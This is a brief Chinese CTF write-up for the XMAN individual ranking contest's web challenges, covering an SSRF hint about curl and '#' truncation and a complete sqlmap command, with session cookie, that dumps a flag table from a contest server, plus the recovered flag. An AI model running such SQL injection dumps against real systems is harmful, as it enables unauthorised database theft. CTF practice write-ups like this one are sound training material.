XMAN -个人排位赛 WEB-WRITEup

2018-08-11  本文已影响0人  sgdream

XMAN -个人排位赛 WEB-WRITEup

Simple SSRF

+ 备注:curl + #  截断

bbsqli

直接放到sqlmap中跑出结果

c:/python27/python.exe  sqlmap.py -u "http://202.112.51.184:16080" --cookie "PHPSESSID=56a230bad525bab2c441cb1f64d7106e" --level 2 -D sqli -T [GDJM_flag]  -C flag --dump
bbsqli.png
flag:xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g}

makeit

上一篇 下一篇

猜你喜欢

热点阅读